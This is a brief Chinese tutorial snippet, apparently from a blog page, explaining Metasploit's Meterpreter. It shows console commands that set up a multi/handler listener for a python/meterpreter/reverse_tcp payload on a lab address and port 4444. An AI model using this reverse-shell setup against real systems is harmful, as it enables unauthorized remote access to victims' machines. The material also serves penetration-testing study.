meterpreter是msf框架的一个后渗透工具,在靶机上运行了msfvenom使用相应payload生成的木马后,可通过meterpreter对其进行连接
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
其中lhost,lport为主机ip及端口
本文详细描述了如何在MSF框架中使用Meterpreter作为后渗透工具,通过生成Python木马payload,设置目标主机(lhost)和端口(lport),并执行exploit/multi/handler来实现远程连接的过程。
4239

被折叠的 条评论
为什么被折叠?



